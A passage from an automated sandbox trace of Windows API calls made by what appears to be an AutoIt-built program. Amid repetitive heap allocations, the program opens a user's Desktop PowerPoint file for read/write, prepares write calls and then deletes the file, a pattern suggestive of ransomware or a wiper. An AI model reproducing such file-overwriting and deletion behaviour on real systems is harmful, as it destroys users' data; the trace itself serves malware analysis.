(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.102] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0162.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0162.103] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0162.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0162.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.105] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.105] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0162.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0162.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0162.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-lwl.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.106] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.106] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0162.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0162.106] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0162.106] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0162.107] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0162.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba2e8 [0162.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba2e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0162.109] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.109] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0162.109] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0162.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0162.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.110] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0162.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0162.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0162.111] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0162.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", lpFilePart=0x0) returned 0x30 [0162.112] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x60f0340, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 0x90af58 [0162.113] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-lwl.pptx")) returned 1 [0162.115] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x60f0340, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 0 [0162.115] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0162.115] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.116] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0162.116] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.116] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.117] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.117] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.117] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0162.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.117] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 